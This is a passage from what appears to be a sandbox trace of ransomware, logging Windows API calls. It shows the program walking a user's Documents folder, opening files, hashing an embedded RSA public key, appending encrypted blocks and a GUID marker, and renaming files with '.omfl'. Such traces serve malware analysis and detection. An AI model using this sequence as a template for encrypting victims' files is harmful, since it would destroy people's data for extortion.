(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\baz0ztpz.docx.omfl")) returned 1 [0130.787] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac807900, ftCreationTime.dwHighDateTime=0x1d5da2a, ftLastAccessTime.dwLowDateTime=0xd28f99e0, ftLastAccessTime.dwHighDateTime=0x1d5df03, ftLastWriteTime.dwLowDateTime=0xd28f99e0, ftLastWriteTime.dwHighDateTime=0x1d5df03, nFileSizeHigh=0x0, nFileSizeLow=0x7d7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cc9FnS KSZ.csv", cAlternateFileName="CC9FNS~1.CSV")) returned 1 [0130.787] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cc9FnS KSZ.csv") returned=".csv" [0130.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cc9FnS KSZ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cc9fns ksz.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.787] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=32126) returned 1 [0130.787] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.791] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x7d58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.791] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.792] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x7d7e, lpOverlapped=0x0) returned 1 [0130.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.792] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.792] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.793] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.794] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.794] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.794] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.794] GetLastError () returned 0x0 [0130.794] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.794] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.794] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.794] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.794] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.794] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.795] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x7d7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.795] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.795] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.795] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.796] CloseHandle (hObject=0x5c8) returned 1 [0130.800] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cc9FnS KSZ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cc9fns ksz.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cc9FnS KSZ.csv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cc9fns ksz.csv.omfl")) returned 1 [0130.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0130.803] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0130.803] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ef6410, ftCreationTime.dwHighDateTime=0x1d5e424, ftLastAccessTime.dwLowDateTime=0xa3c859c0, ftLastAccessTime.dwHighDateTime=0x1d5dfc7, ftLastWriteTime.dwLowDateTime=0xa3c859c0, ftLastWriteTime.dwHighDateTime=0x1d5dfc7, nFileSizeHigh=0x0, nFileSizeLow=0x12fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRmAu0X2lg_Rgw.odp", cAlternateFileName="DRMAU0~1.ODP")) returned 1 [0130.803] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DRmAu0X2lg_Rgw.odp") returned=".odp" [0130.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DRmAu0X2lg_Rgw.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\drmau0x2lg_rgw.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.803] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=77772) returned 1 [0130.803] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.807] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12fa6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.807] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.808] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x12fcc, lpOverlapped=0x0) returned 1 [0130.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.809] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.810] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.810] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.810] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.810] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.810] GetLastError () returned 0x0 [0130.810] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.810] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.810] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.810] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.811] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.813] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.814] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12fcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.814] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.815] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.815] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.815] CloseHandle (hObject=0x5c8) returned 1 [0130.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DRmAu0X2lg_Rgw.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\drmau0x2lg_rgw.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DRmAu0X2lg_Rgw.odp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\drmau0x2lg_rgw.odp.omfl")) returned 1 [0130.823] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17c0c4c0, ftCreationTime.dwHighDateTime=0x1d5d33e, ftLastAccessTime.dwLowDateTime=0xaa8400a0, ftLastAccessTime.dwHighDateTime=0x1d58934, ftLastWriteTime.dwLowDateTime=0xaa8400a0, ftLastWriteTime.dwHighDateTime=0x1d58934, nFileSizeHigh=0x0, nFileSizeLow=0x15822, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dvXJLYtxia0p1inrL2.pptx", cAlternateFileName="DVXJLY~1.PPT")) returned 1 [0130.823] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dvXJLYtxia0p1inrL2.pptx") returned=".pptx" [0130.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dvXJLYtxia0p1inrL2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dvxjlytxia0p1inrl2.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.823] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=88098) returned 1 [0130.823] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.826] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x157fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.826] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.828] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x15822, lpOverlapped=0x0) returned 1 [0130.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.829] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.830] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.830] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.830] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.830] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.830] GetLastError () returned 0x0 [0130.830] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.830] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.830] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.830] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.830] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.831] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.832] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x15822, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.832] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.832] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.832] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.832] CloseHandle (hObject=0x5c8) returned 1 [0130.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dvXJLYtxia0p1inrL2.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dvxjlytxia0p1inrl2.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dvXJLYtxia0p1inrL2.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dvxjlytxia0p1inrl2.pptx.omfl")) returned 1 [0130.839] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1770160, ftCreationTime.dwHighDateTime=0x1d5e08b, ftLastAccessTime.dwLowDateTime=0x61f22830, ftLastAccessTime.dwHighDateTime=0x1d5d89e, ftLastWriteTime.dwLowDateTime=0x61f22830, ftLastWriteTime.dwHighDateTime=0x1d5d89e, nFileSizeHigh=0x0, nFileSizeLow=0x4d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Henh.pps", cAlternateFileName="")) returned 1 [0130.839] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Henh.pps") returned=".pps" [0130.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Henh.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\henh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.840] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=19840) returned 1 [0130.840] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.843] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x4d5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.843] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.844] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.844] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.844] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.844] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x4d80, lpOverlapped=0x0) returned 1 [0130.845] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.845] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.845] lstrlenA (lpString="-----BEGIN PUBLIC 